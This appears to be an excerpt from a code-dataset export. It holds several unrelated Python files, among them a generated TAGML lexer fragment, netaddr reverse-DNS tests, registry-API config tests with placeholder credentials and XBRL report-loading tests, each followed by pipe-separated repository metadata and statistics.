"A_Ref", "A_EndOpenMarkup", "A_EndMilestoneMarkup", "AV_WS",
"AV_StringValue", "AV_NumberValue", "AV_TRUE", "AV_FALSE",
"AV_IdValue", "AV_RichTextOpener", "AV_ObjectOpener",
"AV_ListOpener", "RV_RefValue", "IRT_Comment", "IRT_BeginOpenMarkup",
"IRT_BeginTextVariation", "IRT_BeginCloseMarkup", "IRT_Text",
"IRT_RichTextCloser", "IO_WS", "IO_IdAnnotation", "IO_AnnotationName",
"IO_Ref", "IO_EQ", "IO_ObjectCloser", "IL_SEPARATOR",
"IL_ListCloser", "IMC_Prefix", "IMC_Name", "IMC_Divider",
"IMC_Comma", "IMC_Suffix", "IMC_WS", "IMC_EndCloseMarkup",
"ITV_Comment", "ITV_Text", "ITV_BeginOpenMarkup", "ITV_BeginTextVariation",
"ITV_BeginCloseMarkup", "ITV_EndTextVariation", "Comment",
"TagOpenEndChar", "TagCloseStartChar", "TextVariationStartTag",
"TextVariationEndTag", "TextVariationSeparator", "PIPE",
"Optional", "Resume", "Suspend", "TILDE", "LIST_OPENER",
"LIST_CLOSER", "DOT", "COMMA", "LEFT_SQUARE_BRACKET",
"RIGHT_SQUARE_BRACKET", "DIGIT", "REGULAR_TEXT_ESCAPE_CHARACTER",
"TEXT_VARIATION_ESCAPE_CHARACTER", "COMMENT_ESCAPE_CHARACTER",
"SINGLE_QUOTED_TEXT_ESCAPE_CHARACTER", "DOUBLE_QUOTED_TEXT_ESCAPE_CHARACTER",
"ESCAPE_CHARACTER", "A", "B", "C", "D", "E", "F", "G",
"H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R",
"S", "T", "U", "V", "W", "X", "Y", "Z", "NameChar", "NameStartChar",
"NameEndChar", "WS" ]
grammarFileName = "TAGMLLexer.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.2")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
| 63.065056
| 103
| 0.59315
| 7,169
| 33,929
| 2.763984
| 0.16125
| 0.106687
| 0.069947
| 0.084986
| 0.282816
| 0.230987
| 0.159627
| 0.149937
| 0.149129
| 0.146505
| 0
| 0.316058
| 0.150933
| 33,929
| 537
| 104
| 63.182495
| 0.371772
| 0.002888
| 0
| 0.015444
| 1
| 0.413127
| 0.624708
| 0.562214
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003861
| false
| 0
| 0.007722
| 0
| 0.222008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
700fb6675137f81b8565f082a729eca3c9914cc4
| 416
|
py
|
Python
|
netaddr/tests/ip/test_dns.py
|
Rockly/netaddr
|
9c3b71bf34f2132ced0e143d1a7f5efa706caf48
|
[
"BSD-3-Clause"
] | 416
|
2015-01-02T18:23:32.000Z
|
2020-01-17T02:08:01.000Z
|
netaddr/tests/ip/test_dns.py
|
Rockly/netaddr
|
9c3b71bf34f2132ced0e143d1a7f5efa706caf48
|
[
"BSD-3-Clause"
] | 110
|
2015-01-07T16:14:40.000Z
|
2020-01-08T08:14:11.000Z
|
netaddr/tests/ip/test_dns.py
|
Rockly/netaddr
|
9c3b71bf34f2132ced0e143d1a7f5efa706caf48
|
[
"BSD-3-Clause"
] | 108
|
2015-02-25T09:47:31.000Z
|
2020-01-16T14:24:08.000Z
|
from netaddr import IPAddress
def test_reverse_dns_v4():
assert IPAddress('172.24.0.13').reverse_dns == '13.0.24.172.in-addr.arpa.'
def test_reverse_dns_v6():
assert IPAddress('fe80::feeb:daed').reverse_dns == ('d.e.a.d.b.e.e.f.0.0.0.0.0.0.0.0.'
'0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.'
'ip6.arpa.')
| 34.666667
| 90
| 0.478365
| 70
| 416
| 2.728571
| 0.4
| 0.209424
| 0.298429
| 0.376963
| 0.109948
| 0.109948
| 0.109948
| 0.109948
| 0.109948
| 0.109948
| 0
| 0.155797
| 0.336538
| 416
| 11
| 91
| 37.818182
| 0.536232
| 0
| 0
| 0
| 0
| 0.285714
| 0.298077
| 0.213942
| 0
| 0
| 0
| 0
| 0.285714
| 1
| 0.285714
| true
| 0
| 0.142857
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
706e6ac603cd54c981dfbaf6e86b9d703cc893ea
| 9,343
|
py
|
Python
|
tests/unit/test_config.py
|
neuro-inc/platform-registry-api
|
a69ebf9912d86da589e2bc0fca983c760ec7fe72
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_config.py
|
neuro-inc/platform-registry-api
|
a69ebf9912d86da589e2bc0fca983c760ec7fe72
|
[
"Apache-2.0"
] | 7
|
2021-11-19T00:06:38.000Z
|
2022-03-25T00:10:09.000Z
|
tests/unit/test_config.py
|
neuro-inc/platform-registry-api
|
a69ebf9912d86da589e2bc0fca983c760ec7fe72
|
[
"Apache-2.0"
] | null | null | null |
from yarl import URL
from platform_registry_api.config import (
AuthConfig,
Config,
EnvironConfigFactory,
SentryConfig,
ServerConfig,
UpstreamRegistryConfig,
UpstreamType,
ZipkinConfig,
)
class TestEnvironConfigFactory:
def test_defaults_oauth(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TOKEN_URL": "https://test_host/token",
"NP_REGISTRY_UPSTREAM_TOKEN_SERVICE": "test_host",
"NP_REGISTRY_UPSTREAM_TOKEN_USERNAME": "test_username",
"NP_REGISTRY_UPSTREAM_TOKEN_PASSWORD": "test_password",
"NP_REGISTRY_AUTH_URL": "-",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.OAUTH,
token_endpoint_url=URL("https://test_host/token"),
token_service="test_host",
token_endpoint_username="test_username",
token_endpoint_password="test_password",
token_registry_catalog_scope="registry:catalog:*",
token_repository_scope_actions="*",
max_catalog_entries=100,
),
auth=AuthConfig(
server_endpoint_url=None,
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert config.upstream_registry.is_oauth
def test_oauth(self) -> None:
environ = {
"NP_REGISTRY_API_PORT": "1234",
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "oauth",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "10000",
"NP_REGISTRY_UPSTREAM_TOKEN_URL": "https://test_host/token",
"NP_REGISTRY_UPSTREAM_TOKEN_SERVICE": "test_host",
"NP_REGISTRY_UPSTREAM_TOKEN_USERNAME": "test_username",
"NP_REGISTRY_UPSTREAM_TOKEN_PASSWORD": "test_password",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_REGISTRY_UPSTREAM_TOKEN_REGISTRY_SCOPE": "",
"NP_REGISTRY_UPSTREAM_TOKEN_REPO_SCOPE_ACTIONS": "push,pull",
"NP_CLUSTER_NAME": "test-cluster",
"NP_ZIPKIN_URL": "http://zipkin.io:9411/",
"NP_SENTRY_DSN": "https://sentry",
"NP_SENTRY_CLUSTER_NAME": "test",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(port=1234),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.OAUTH,
token_endpoint_url=URL("https://test_host/token"),
token_service="test_host",
token_endpoint_username="test_username",
token_endpoint_password="test_password",
token_registry_catalog_scope="",
token_repository_scope_actions="push,pull",
max_catalog_entries=10000,
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
zipkin=ZipkinConfig(URL("http://zipkin.io:9411/")),
sentry=SentryConfig(dsn=URL("https://sentry"), cluster_name="test"),
)
assert config.upstream_registry.is_oauth
def test_aws_ecr(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "aws_ecr",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "1000",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.AWS_ECR,
max_catalog_entries=1000,
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert not config.upstream_registry.is_oauth
def test_defaults_basic(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "basic",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "1000",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.BASIC,
max_catalog_entries=1000,
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert config.upstream_registry.is_basic
assert not config.upstream_registry.is_oauth
def test_basic(self) -> None:
environ = {
"NP_REGISTRY_UPSTREAM_URL": "https://test_host",
"NP_REGISTRY_UPSTREAM_PROJECT": "test_project",
"NP_REGISTRY_UPSTREAM_TYPE": "basic",
"NP_REGISTRY_UPSTREAM_MAX_CATALOG_ENTRIES": "1000",
"NP_REGISTRY_AUTH_URL": "https://test_auth",
"NP_REGISTRY_AUTH_TOKEN": "test_auth_token",
"NP_CLUSTER_NAME": "test-cluster",
"NP_REGISTRY_UPSTREAM_BASIC_USERNAME": "testuser",
"NP_REGISTRY_UPSTREAM_BASIC_PASSWORD": "testpassword",
}
config = EnvironConfigFactory(environ=environ).create()
assert config == Config(
server=ServerConfig(),
upstream_registry=UpstreamRegistryConfig(
endpoint_url=URL("https://test_host"),
project="test_project",
type=UpstreamType.BASIC,
max_catalog_entries=1000,
basic_username="testuser",
basic_password="testpassword",
),
auth=AuthConfig(
server_endpoint_url=URL("https://test_auth"),
service_token="test_auth_token",
),
cluster_name="test-cluster",
)
assert config.upstream_registry.is_basic
assert not config.upstream_registry.is_oauth
def test_create_zipkin_none(self) -> None:
result = EnvironConfigFactory({}).create_zipkin()
assert result is None
def test_create_zipkin_default(self) -> None:
env = {"NP_ZIPKIN_URL": "https://zipkin:9411"}
result = EnvironConfigFactory(env).create_zipkin()
assert result == ZipkinConfig(url=URL("https://zipkin:9411"))
def test_create_zipkin_custom(self) -> None:
env = {
"NP_ZIPKIN_URL": "https://zipkin:9411",
"NP_ZIPKIN_APP_NAME": "api",
"NP_ZIPKIN_SAMPLE_RATE": "1",
}
result = EnvironConfigFactory(env).create_zipkin()
assert result == ZipkinConfig(
url=URL("https://zipkin:9411"), app_name="api", sample_rate=1
)
def test_create_sentry_none(self) -> None:
result = EnvironConfigFactory({}).create_sentry()
assert result is None
def test_create_sentry_default(self) -> None:
env = {
"NP_SENTRY_DSN": "https://sentry",
"NP_SENTRY_CLUSTER_NAME": "test",
}
result = EnvironConfigFactory(env).create_sentry()
assert result == SentryConfig(dsn=URL("https://sentry"), cluster_name="test")
def test_create_sentry_custom(self) -> None:
env = {
"NP_SENTRY_DSN": "https://sentry",
"NP_SENTRY_APP_NAME": "api",
"NP_SENTRY_CLUSTER_NAME": "test",
"NP_SENTRY_SAMPLE_RATE": "1",
}
result = EnvironConfigFactory(env).create_sentry()
assert result == SentryConfig(
dsn=URL("https://sentry"),
app_name="api",
cluster_name="test",
sample_rate=1,
)
| 39.757447
| 85
| 0.594028
| 916
| 9,343
| 5.646288
| 0.082969
| 0.079273
| 0.104408
| 0.04331
| 0.847254
| 0.820379
| 0.784416
| 0.768175
| 0.746326
| 0.724478
| 0
| 0.011096
| 0.295836
| 9,343
| 234
| 86
| 39.92735
| 0.775042
| 0
| 0
| 0.637209
| 0
| 0
| 0.295622
| 0.124371
| 0
| 0
| 0
| 0
| 0.083721
| 1
| 0.051163
| false
| 0.027907
| 0.009302
| 0
| 0.065116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
568dd41db8ead1c96dd184c053e0afb96a2ae266
| 38
|
py
|
Python
|
app/src/controllers/__init__.py
|
beerjoa/flask-restplus-skeleton
|
efa221a00620746c9b7227d3840b2a43d788db1b
|
[
"Apache-2.0"
] | 1
|
2021-02-03T03:30:00.000Z
|
2021-02-03T03:30:00.000Z
|
app/src/controllers/__init__.py
|
beerjoa/flask-restplus-skeleton
|
efa221a00620746c9b7227d3840b2a43d788db1b
|
[
"Apache-2.0"
] | null | null | null |
app/src/controllers/__init__.py
|
beerjoa/flask-restplus-skeleton
|
efa221a00620746c9b7227d3840b2a43d788db1b
|
[
"Apache-2.0"
] | null | null | null |
from .calculation import ns as calc_ns
| 38
| 38
| 0.842105
| 7
| 38
| 4.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 1
| 38
| 38
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3b9d31f76bfe0efe3d4b7728de14a95a8cedec4e
| 121
|
py
|
Python
|
lang/py/cookbook/v2/source/cb2_6_16_exm_2.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_6_16_exm_2.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_6_16_exm_2.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
name->Lara name->Lara
name->John Malkovich name->John Malkovich name->John Malkovich
name->Seven name->Seven name->Seven
| 30.25
| 62
| 0.77686
| 19
| 121
| 4.947368
| 0.263158
| 0.255319
| 0.542553
| 0.670213
| 0.585106
| 0.585106
| 0.585106
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 121
| 3
| 63
| 40.333333
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8e59729a803984658be1bca1e1c85e3d6c986f89
| 33
|
py
|
Python
|
nanome_vault/menus/__init__.py
|
nanome-ai/plugin-vault
|
06ed12cccc937b278befd339155a37a8321fe61e
|
[
"MIT"
] | null | null | null |
nanome_vault/menus/__init__.py
|
nanome-ai/plugin-vault
|
06ed12cccc937b278befd339155a37a8321fe61e
|
[
"MIT"
] | 19
|
2020-07-23T04:36:53.000Z
|
2022-02-15T01:09:48.000Z
|
nanome_vault/menus/__init__.py
|
nanome-ai/plugin-vault
|
06ed12cccc937b278befd339155a37a8321fe61e
|
[
"MIT"
] | null | null | null |
from .VaultMenu import VaultMenu
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8e95739cc31cf3a427492342bdbd790c8d3f286c
| 107
|
py
|
Python
|
Day_4_Scripting/read_int_arguments.py
|
swetarani-G/Python-Deep-Learning-Bootcamp
|
a426f094f408172b57f13881ea71c956194aa6f1
|
[
"Apache-2.0"
] | null | null | null |
Day_4_Scripting/read_int_arguments.py
|
swetarani-G/Python-Deep-Learning-Bootcamp
|
a426f094f408172b57f13881ea71c956194aa6f1
|
[
"Apache-2.0"
] | null | null | null |
Day_4_Scripting/read_int_arguments.py
|
swetarani-G/Python-Deep-Learning-Bootcamp
|
a426f094f408172b57f13881ea71c956194aa6f1
|
[
"Apache-2.0"
] | null | null | null |
with open("spiderman.txt") as song:
print(song.read(2))
print(song.read(8))
print(song.read())
| 21.4
| 35
| 0.626168
| 17
| 107
| 3.941176
| 0.588235
| 0.402985
| 0.58209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022727
| 0.17757
| 107
| 4
| 36
| 26.75
| 0.738636
| 0
| 0
| 0
| 0
| 0
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8ec70417d2a360f493411330fa336f1e858d5b58
| 131
|
py
|
Python
|
bot/formats/dateTime.py
|
amtp1/garant-bot-2
|
9b5e91c31895836f8ded110bc036ebcf5a1e4be6
|
[
"BSD-3-Clause"
] | null | null | null |
bot/formats/dateTime.py
|
amtp1/garant-bot-2
|
9b5e91c31895836f8ded110bc036ebcf5a1e4be6
|
[
"BSD-3-Clause"
] | null | null | null |
bot/formats/dateTime.py
|
amtp1/garant-bot-2
|
9b5e91c31895836f8ded110bc036ebcf5a1e4be6
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime as dt
def datetime_format(datetime) -> str:
return dt.strftime(datetime, "%Y-%m-%d %H:%M:%S")
| 32.75
| 53
| 0.679389
| 21
| 131
| 4.190476
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 131
| 4
| 53
| 32.75
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.131783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
d920ab7a6c4651fa6e95cdc6b8f18613429f14c5
| 126
|
py
|
Python
|
src/WeaponsTab/__init__.py
|
AndrewGrim/MonsterHunterWorldDatabase
|
a904647f5499926e46a64d884a2ffebe38dd5407
|
[
"MIT"
] | 1
|
2020-02-17T00:16:01.000Z
|
2020-02-17T00:16:01.000Z
|
src/WeaponsTab/__init__.py
|
AndrewGrim/MonsterHunterWorldDatabase
|
a904647f5499926e46a64d884a2ffebe38dd5407
|
[
"MIT"
] | null | null | null |
src/WeaponsTab/__init__.py
|
AndrewGrim/MonsterHunterWorldDatabase
|
a904647f5499926e46a64d884a2ffebe38dd5407
|
[
"MIT"
] | 1
|
2020-06-26T06:54:00.000Z
|
2020-06-26T06:54:00.000Z
|
from .WeaponsTab import *
from .WeaponUsage import *
from .WeaponMaterial import *
from .Weapon import *
from .Melody import *
| 25.2
| 29
| 0.769841
| 15
| 126
| 6.466667
| 0.466667
| 0.412371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150794
| 126
| 5
| 30
| 25.2
| 0.906542
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d929f954fce5f71ddd8e24a1f920ce56fc970cd4
| 3,811
|
py
|
Python
|
test/xml/report/test_loadixbrl.py
|
blinkace/pxp
|
9155103dc166674137bd0e2fddb609ca44875761
|
[
"MIT"
] | 1
|
2022-01-27T14:53:23.000Z
|
2022-01-27T14:53:23.000Z
|
test/xml/report/test_loadixbrl.py
|
blinkace/pxp
|
9155103dc166674137bd0e2fddb609ca44875761
|
[
"MIT"
] | null | null | null |
test/xml/report/test_loadixbrl.py
|
blinkace/pxp
|
9155103dc166674137bd0e2fddb609ca44875761
|
[
"MIT"
] | null | null | null |
import xbrl
from xbrl.const import NS, LinkType, LinkGroup
import os.path
from urllib.request import pathname2url
import datetime
def test_loadixbrl():
processor = xbrl.XBRLProcessor()
url = "file:" + pathname2url(os.path.abspath(os.path.join(os.path.dirname(__file__), "simple-ixbrl.xhtml")))
report = processor.loadIXBRLReport(url)
assert len(report.facts) == 8
f = report.facts.get("f1")
assert f is not None
assert f.value == "This is the first part of a continued tag.This is the second part of a continued tag.This is the third part of a continued tag."
assert f.stringValue == "This is the first part of a continued tag.This is the second part of a continued tag.This is the third part of a continued tag."
assert not f.isNumeric
assert f.unit is None
assert f.period.isDuration
assert f.period.stringValue == '2018-01-01T00:00:00/2019-01-01T00:00:00'
assert f.period.start == datetime.datetime(2018, 1, 1, 0, 0, 0)
assert f.period.end == datetime.datetime(2019, 1, 1, 0, 0, 0)
assert f.entity.scheme == 'http://www.example.com/entity'
assert f.entity.identifier == '12345678'
footnotes = f.links[LinkType.footnote][LinkGroup.default]
assert len(footnotes) == 2
fids = set((fn.id for fn in footnotes))
assert fids == {"fn1", "fn2"}
f = report.facts.get("f4")
assert f is not None
assert f.value == "1234.56"
assert f.stringValue == "1234.56"
assert f.isNumeric
assert f.decimals == 2
assert f.unit.stringValue == 'iso4217:EUR'
assert f.period.isDuration
assert f.period.stringValue == '2018-01-01T00:00:00/2019-01-01T00:00:00'
assert f.period.start == datetime.datetime(2018, 1, 1, 0, 0, 0)
assert f.period.end == datetime.datetime(2019, 1, 1, 0, 0, 0)
assert f.entity.scheme == 'http://www.example.com/entity'
assert f.entity.identifier == '12345678'
footnotes = f.links[LinkType.footnote][LinkGroup.default]
assert len(footnotes) == 2
fids = set((fn.id for fn in footnotes))
assert fids == {"fn2", "fn4"}
f = report.facts.get("f5")
assert f is not None
assert f.value == "-567000"
assert f.stringValue == "-567000"
assert f.isNumeric
assert f.decimals == 0
assert f.unit.stringValue == 'iso4217:EUR'
assert f.period.isDuration
assert f.period.stringValue == '2017-01-01T00:00:00/2018-01-01T00:00:00'
assert f.period.start == datetime.datetime(2017, 1, 1, 0, 0, 0)
assert f.period.end == datetime.datetime(2018, 1, 1, 0, 0, 0)
assert f.entity.scheme == 'http://www.example.com/entity'
assert f.entity.identifier == '12345678'
f = report.facts.get("f15")
assert f is not None
assert f.value == "And <b>a</b> nested < fact."
assert not f.isNumeric
assert f.period.isDuration
assert f.period.stringValue == '2017-01-01T00:00:00/2018-01-01T00:00:00'
assert f.entity.scheme == 'http://www.example.com/entity'
assert f.entity.identifier == '12345678'
f = report.facts.get("fn1")
assert f is not None
assert f.value == " This is the content of footnote 1. "
assert f.stringValue == " This is the content of footnote 1. "
assert not f.isNumeric
assert f.period is None
assert f.entity is None
f = report.facts.get("fn2")
assert f is not None
assert f.value == "<p>This is the content of footnote 2.</p>\n <p>It has <b>bold</b> and a nested footnote.\n And a nested fact.\n \n </p>\n "
assert not f.isNumeric
assert f.period is None
assert f.entity is None
f = report.facts.get("fn4")
assert f is not None
assert f.value == "It has <b>bold</b> and a nested footnote.\n And a nested fact.\n "
assert not f.isNumeric
assert f.period is None
assert f.entity is None
| 40.115789
| 162
| 0.661244
| 605
| 3,811
| 4.157025
| 0.175207
| 0.147515
| 0.087873
| 0.03499
| 0.818688
| 0.818688
| 0.766203
| 0.758648
| 0.682704
| 0.682704
| 0
| 0.083416
| 0.207295
| 3,811
| 94
| 163
| 40.542553
| 0.74909
| 0
| 0
| 0.578313
| 0
| 0.048193
| 0.255314
| 0.040934
| 0
| 0
| 0
| 0
| 0.759036
| 1
| 0.012048
| false
| 0
| 0.060241
| 0
| 0.072289
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
795ea58381492dcb86878bcbbda527c0fc22dc9f
| 45
|
py
|
Python
|
imet2020/code/augmentations/__init__.py
|
karunru/kaggle_practice
|
a368bcf11bd68910bdd4cba9e691f1d7f6ae0b37
|
[
"MIT"
] | null | null | null |
imet2020/code/augmentations/__init__.py
|
karunru/kaggle_practice
|
a368bcf11bd68910bdd4cba9e691f1d7f6ae0b37
|
[
"MIT"
] | null | null | null |
imet2020/code/augmentations/__init__.py
|
karunru/kaggle_practice
|
a368bcf11bd68910bdd4cba9e691f1d7f6ae0b37
|
[
"MIT"
] | null | null | null |
from .aug_utils import rand_bbox, rand_region
| 45
| 45
| 0.866667
| 8
| 45
| 4.5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7978ddeb7051d4fc1d14085fb6db0225c9b21c95
| 37
|
py
|
Python
|
basics/1_print.py
|
hardikid/learn-python
|
6b3684c9d459dc10ed41e3328daf49313a34b375
|
[
"MIT"
] | 1
|
2019-11-19T11:42:50.000Z
|
2019-11-19T11:42:50.000Z
|
basics/1_print.py
|
hardikid/learn-python
|
6b3684c9d459dc10ed41e3328daf49313a34b375
|
[
"MIT"
] | 5
|
2021-08-23T20:36:02.000Z
|
2022-02-03T13:20:23.000Z
|
basics/1_print.py
|
ihardik/learn-python
|
6b3684c9d459dc10ed41e3328daf49313a34b375
|
[
"MIT"
] | null | null | null |
print("This is print from python.")
| 12.333333
| 35
| 0.702703
| 6
| 37
| 4.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162162
| 37
| 2
| 36
| 18.5
| 0.83871
| 0
| 0
| 0
| 0
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
